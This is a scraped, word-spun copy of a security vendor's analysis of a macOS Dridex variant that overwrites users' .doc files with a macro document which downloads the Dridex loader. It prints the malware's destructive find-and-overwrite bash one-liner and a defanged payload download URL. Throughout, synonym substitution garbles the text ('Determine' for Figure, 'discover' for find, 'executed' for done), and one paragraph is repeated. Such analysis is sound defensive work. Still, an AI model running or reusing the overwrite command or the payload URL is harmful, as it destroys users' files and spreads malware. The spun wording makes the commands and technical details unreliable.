[ad_1]
Dridex Returns, Targets MacOS Utilizing New Entry Methodology
Malware
The Dridex variant we analyzed targets MacOS platforms with a brand new method to ship paperwork embedded with malicious macros to customers.
By: Armando Nathaniel Pedragoza
January 05, 2023
Learn time: ( phrases)
Usually, paperwork containing malicious macros enter a person’s system by way of e-mail attachments posing as regular doc information. Nevertheless, whereas this is perhaps the first methodology of arrival, malicious actors produce other methods of getting into a sufferer’s system.
This weblog entry primarily considerations Dridex, a web-based banking malware that has been lively for years. The variant we analyzed has made its means into the MacOS platform and has adopted a brand new method to ship paperwork embedded with malicious macros to customers with out having to fake to be invoices or different business-related information.
The Dridex pattern we investigated arrived as a Mach-o executable file: a.out (which we detected as Trojan.MacOS.DRIDEX.MANP). The primary submission for this in Virus Complete (VT) dates to 2019, the place it was tagged as malicious by safety distributors with no particular detection names.
Determine 1. Mach-o areas which include the header, load instructions, and segments of the file
Determine 2. Detections of a.out from April 2019 to December 2022
The information section of the pattern comprises the malicious embedded doc and is utilized by the _payload_doc variable. The disassembly in Determine 5 reveals that the malware performs a loop the place the content material of _payload_doc is copied till the counter reaches _payload_doc_len, the scale of the malicious code. That is in preparation for the overwriting routine.
Determine 3. Disassembly of the __DATA__data section
The information section of the pattern comprises the malicious embedded doc and is utilized by the _payload_doc variable. The disassembly in Determine 5 reveals that the malware performs a loop the place the content material of _payload_doc is copied till the counter reaches _payload_doc_len, the scale of the malicious code. That is in preparation for the overwriting routine.
Determine 4. Disassembly of how the pattern writes knowledge onto the goal information
As soon as the malicious code is prepared, the cstring section performs a task in overwriting the code to the goal information. This section comprises the next bash script command:
for i in $(discover ~ -name “*.doc”); do echo ‘%s’ | xxd -r -p > $i; executed
First, the malware searches for information within the present person (~/Person/{person title}) listing that use the .doc file extension utilizing the discover ~ -name “*.doc” command. It then traverses by way of every doc file (i) utilizing for loop, after which writes the malicious code by way of the echo ‘%s’ command (the place %s is the malicious code from the information section).
Including xxd -r -p to the script implies that the malicious code might be written in plain hexadecimal dump, and never the precise content material. The > $i a part of the script implies that the output might be printed on every doc file.
Determine 5. Disassembly of the __DATA__cstring section
The disassembly in Determine 6 reveals the worth of %s that might be written on the doc information. The malicious code it overwrites has a D0CF file format signature as seen the picture, which means that it’s a Microsoft doc file.
Determine 6. Disassembly of the pattern that reveals the search and overwriting instructions
The malicious embedded doc was first detected within the wild in 2015 with the next info:SHA256: 70c7bf63bfe1fb83420905db6e65946d721e171db219034a52b27116795ae53eFilename: pmB3A6.docDetection title: W2KM_DRIDEX.SPB
Utilizing oletools, a python bundle used to investigate OLE and Microsoft information, we noticed that the affected .doc information now include macros.
Determine 7. Textual content immediate exhibiting that this doc file comprises macros
Determine 8. Macros contained within the overwritten .doc file that have been extracted utilizing oletools
Based mostly on the extracted macros, the .doc file comprises suspicious parts. To elaborate, listed below are the VBA parts of the overwritten paperwork:
ThisDocument is an object that features the autoopen macro which calls the malicious capabilities. These capabilities use normal-looking names to pose as common capabilities. For example, CreatePicture and CreateColor are usually used to create image-related objects, however on this VBA undertaking, they carry out malicious duties.
Determine 9. Code snippet from the autoopen macro
Module1 Creates an executable file within the non permanent (TEMP) folder after which runs it. The malware makes use of string concatenation as a technique for obfuscating the title of the executable file it creates.
Determine 10. Code snippet from Module1 that reveals how the malware creates and executes an executable file
Module2 comprises the routine that decrypts a set of strings, which is a URL, after which connects to it to retrieve a file utilizing the GET command. The malware makes use of primary string encryption to cover the malicious URL it connects to. It calls the RuBik() operate to carry out the decryption routine.
Determine 11. Code snippet from Module2 exhibiting the decryption routine to hook up with the encrypted URL
Module3 writes the content material of the file retrieved in Module2 to the executable file created in Module1.
Determine 12. Code snippet from Module3 exhibiting the place the malware writes to the executable file
On this part, we are going to analyze the payload dropped by the malware. Word that since it’s an exe file, it won’t run in a MacOS setting. It’s potential that the variant we analyzed continues to be within the testing phases and has not but been totally transformed to work in MacOS-based machines.
When the doc is opened and the macro is enabled, the malware connects to the URL decrypted in Module2 to retrieve a file (87i4g3d2d2.exe) utilizing the GET command:
hxxp://pr-clanky[.]kvalitne[.]cz/65y3fd23d/87i4g3d2d2[.]exe
Whereas the macro characteristic in Microsoft Phrase is disabled by default, the malware will overwrite all of the doc information for the present person, together with the clear information. This makes it tougher for the person to find out whether or not the file is malicious because it doesn’t come from an exterior supply.
After connecting to the area, the content material of the transportable executable (PE) file is written to trume1.exe (aa6873a6002e152669f54c80801ca7d500ee8c00d5a6a8c223203303b1cbaf50) as analyzed in Module1, 2, and three. The file trume1.exe will then be executed.
Determine 13. Community exercise from the pattern that reveals the small print of the URL it connects to
Determine 14. Payload of the pattern when the macro-enabled doc is opened
The content material of the dropped executable file is in an HTML format as an alternative of a PE file format because the URL that it’s attempting to entry is already down. The PE file that it tries to obtain is the Dridex loader.
Determine 15. Content material of the executable file dropped by the malware
Conclusion
Dridex will not be a brand new malware — it has been noticed within the wild for years now. Regardless of its age, it continues for use, and in reality has even seen many enhancements over time. Its entry level into the person’s system has historically been by way of e-mail attachments, however this weblog entry illustrates that the malicious actors utilizing Dridex are additionally looking for new targets and extra environment friendly strategies of entry.
Presently, the influence on MacOS customers for this Dridex variant is minimized because the payload is an exe file (and due to this fact not suitable with MacOS environments). Nevertheless, it nonetheless overwrites doc information which are actually the carriers of Dridex’s malicious macros. Moreover, it’s potential that the menace actors behind this variant will implement additional modifications that may make it suitable with MacOS.
We encourage customers to keep away from being contaminated by assaults that use social engineering and malicious paperwork by refraining from clicking hyperlinks or opening attachments and embedded paperwork in emails. Moreover, organizations can think about using safety applied sciences comparable to Development Micro™ Fear-Free™ Enterprise Safety, which helps Mac and is right for small and medium-sized firms, and Development Micro™ Apex One™, which is a robust safety resolution for enterprise companies.
Indicators of Compromise
The symptoms of compromise for this entry might be discovered on this doc.MITRE Instruments, Ways, and Procedures
Tactic
ID
Title
Description
Discovery
T1083
File and Listing Discovery
Makes use of the discover command to seek for particular information inside the file system and runs echo command to overwrite information
Execution
T1204.002
Person Execution: Malicious File
Requires the sufferer to run the malware .out file.
Execution
T1027
Obfuscated Information or Data
Parts of information are encoded to cover the plain-text strings
Execution
T1059.005
Command and Scripting Interpreter: Visible Primary
Makes use of macros to execute payloads
Command and Management
T1071.001
Utility Layer Protocol: Internet Protocols
Makes use of HTTP GET requests to contact the command-and-control (C&C) server
Exfiltration
T1041
Exfiltration Over C2 Channel
Sends knowledge to C&C server
Tags
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
[ad_2]